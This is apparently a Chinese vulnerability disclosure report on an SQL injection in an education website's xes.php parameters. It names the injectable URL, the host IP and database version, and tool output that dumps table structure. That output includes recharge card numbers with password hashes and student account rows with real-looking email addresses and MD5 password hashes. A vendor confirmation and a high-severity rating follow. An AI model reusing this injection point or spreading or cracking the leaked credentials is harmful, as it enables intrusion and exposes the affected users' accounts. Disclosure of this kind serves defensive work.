2015-02-12: 细节已通知厂商并且等待厂商处理中 2015-02-12: 厂商已经确认,细节仅向厂商公开 2015-02-22: 细节向核心白帽子及相关领域专家公开 2015-03-04: 细节向普通白帽子公开 2015-03-14: 细节向实习白帽子公开 2015-03-29: 细节向公众公开
............
..................
http://www.xueersi.com/xes.php?source=860793&site_id=275&adsite_id=6966**号处为注入点Target: http://www.xueersi.com/xes.php?source=860793&site_id=275&adsite_id=6966Host IP: 42.62.108.136Web Server: tengine/1.1.2DB Server: MySQL error basedResp. Time(avg): 1407 msSql Version: 5.5.30-logCurrent DB: wssHost Name: mysql-93Installation dir: /data/3306mysqlCompile OS: LinuxCount(column_name) of information_schema.columns where table_schema=0x777373 and table_name=0x7865735F636172645F696E666F73 is 7Column found: idColumn found: cardnoColumn found: xes_card_batch_idColumn found: use_timeColumn found: passwdColumn found: consume_timeColumn found: xes_card_status_idCount(*) of wss.xes_card_infos is 6861740Data Found: passwd,id,cardno=c36535e3b52ae12ee91fe485f10da2dd^1^100010000Data Found: passwd,id,cardno=6e90697e469af28cae2d832afb60f0b8^2^100010001Data Found: passwd,id,cardno=048fbf9e6ab96c7f6d5021950f4e020f^4^100010003Data Found: passwd,id,cardno=f5ca54c298e4ebb2739a6da201dc79bc^6^100010005Data Found: passwd,id,cardno=1b68eea1527f01d406f2308115165ad0^9^100010008Data Found: passwd,id,cardno=6697eea00bcf0584ec2569fa77a96339^7^100010006Data Found: passwd,id,cardno=fe8098a63571d867175432ec2697ce1c^8^100010007部分充值卡的Count(*) of wss.xes_students is 1398175Data Found: id,password,name=Data Found: id,password,name=10014^e10adc3949ba59abbe56e057f20f883e^lds01@xueersi.comData Found: id,password,name=10015^e4e1d11799d0d1cfbf5ec945310a4a2e^along@xueersi.comData Found: id,password,name=10017^e10adc3949ba59abbe56e057f20f883e^test999@qq.comData Found: id,password,name=Data Found: id,password,name=10020^338f17e848877c2edddcb5223754c7c3^cucucyy1@163.comData Found: id,password,name=Data Found: id,password,name=10022^e10adc3949ba59abbe56e057f20f883e^hegengfan@xueersi.comData Found: id,password,name=10021^e10adc3949ba59abbe56e057f20f883e^390422262@qq.comData Found: id,password,name=10024^e10adc3949ba59abbe56e057f20f883e^kel1216@pku.edu.cnData Found: id,password,name=10027^e5c0e4ebbafa1386c55a4e8d9ec1c7dd^lufeifei@xueersi.comData Found: id,password,name=10025^e10adc3949ba59abbe56e057f20f883e^lirui2@xueersi.comData Found: id,password,name=Data Found: id,password,name=10041^136422818acf50e662b604c45ddb2924^phi@100tal.comData Found: id,password,name=10043^e10adc3949ba59abbe56e057f20f883e^xesxiao1@xueersi.comData Found: id,password,name=10042^e10adc3949ba59abbe56e057f20f883e^hongran19@sohu.comData Found: id,password,name=10045^e10adc3949ba59abbe56e057f20f883e^xesxiao3@xueersi.comData Found: id,password,name=10044^e10adc3949ba59abbe56e057f20f883e^xesxiao2@xueersi.comData Found: id,password,name=10046^e10adc3949ba59abbe56e057f20f883e^xesxiao4@xueersi.comCount(*) of wss.xes_yxt_users is 21953部分用户信息的
...........
危害等级:高
漏洞Rank:20
确认时间:2015-02-12 13:32
非常感谢,加紧修复中
暂无